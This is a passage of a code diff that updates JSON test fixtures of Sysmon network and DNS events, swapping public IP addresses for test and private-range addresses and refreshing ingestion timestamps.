Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003ea9fe:b419:0:0:f880:2301:e0:ffff\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55717\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003ee000:fc:0:0:0:0:0:0\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e19\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55717\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.340Z", @@ -9081,7 +8988,7 @@ }, "destination": { "port": 137, - "ip": "40.77.226.250" + "ip": "89.160.20.156" }, "source": { "port": 137, @@ -9090,7 +8997,7 @@ }, "network": { "protocol": "netbios-ns", - "community_id": "1:DI+g4BImhWaUwPmLEjdMMQVYPLs=", + "community_id": "1:W+rKY9g2gw/4oKxs1Chg32lzBig=", "transport": "udp", "type": "ipv4", "direction": "egress" @@ -9105,16 +9012,16 @@ ], "ip": [ "10.0.2.15", - "40.77.226.250" + "89.160.20.156" ] }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-10-14T04:10:32.313856820Z", + "ingested": "2021-12-09T13:49:44.739528500Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e20\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.264\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e40.77.226.250\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e20\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.264\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.340Z", @@ -9194,7 +9101,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-10-14T04:10:32.313858438Z", + "ingested": "2021-12-09T13:49:44.739533700Z", "code": "3", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e21\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.276\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e10.0.2.3\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -9245,7 +9152,7 @@ }, "destination": { "port": 137, - "ip": "169.254.255.255" + "ip": "89.160.20.156" }, "source": { "port": 137, @@ -9254,7 +9161,7 @@ }, "network": { "protocol": "netbios-ns", - "community_id": "1:ZHyFuF2PjubLSbAh4zRQIZHOZK8=", + "community_id": "1:W+rKY9g2gw/4oKxs1Chg32lzBig=", "transport": "udp", "type": "ipv4", "direction": "egress" @@ -9269,13 +9176,13 @@ ], "ip": [ "10.0.2.15", - "169.254.255.255" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313859769Z", + "ingested": "2021-12-09T13:49:44.739538900Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e22\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.213\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e169.254.255.255\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e22\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.213\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:50.357Z", @@ -9341,27 +9248,27 @@ "type": "CNAME" }, { - "data": "151.101.66.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.130.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.194.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.2.2", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "151.101.66.2", - "151.101.130.2", - "151.101.194.2", - "151.101.2.2" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -9377,16 +9284,13 @@ "api-s2s.taboola.com" ], "ip": [ - "151.101.66.2", - "151.101.130.2", - "151.101.194.2", - "151.101.2.2" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313860996Z", + "ingested": "2021-12-09T13:49:44.739544700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029861900Z'/\u003e\u003cEventRecordID\u003e128\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.890\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eapi-s2s.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:151.101.66.2;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029861900Z'/\u003e\u003cEventRecordID\u003e128\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.890\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eapi-s2s.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", @@ -9446,17 +9350,17 @@ }, "answers": [ { - "data": "35.231.30.22", + "data": "89.160.20.156", "type": "A" }, { - "data": "35.196.212.198", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "35.231.30.22", - "35.196.212.198" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -9471,14 +9375,13 @@ "x.bidswitch.net" ], "ip": [ - "35.231.30.22", - "35.196.212.198" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313862224Z", + "ingested": "2021-12-09T13:49:44.739550700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029870000Z'/\u003e\u003cEventRecordID\u003e129\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.892\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.bidswitch.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.231.30.22;::ffff:35.196.212.198;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029870000Z'/\u003e\u003cEventRecordID\u003e129\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.892\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.bidswitch.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", @@ -9542,11 +9445,11 @@ "type": "CNAME" }, { - "data": "199.166.0.26", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -9554,7 +9457,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -9562,7 +9465,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -9570,7 +9473,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -9578,21 +9481,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "199.166.0.26", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -9608,22 +9511,22 @@ "pixel.adsafeprotected.com" ], "ip": [ - "199.166.0.26", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313864354Z", + "ingested": "2021-12-09T13:49:44.739556500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029880600Z'/\u003e\u003cEventRecordID\u003e130\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.pixel.adsafeprotected.com;::ffff:199.166.0.26;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 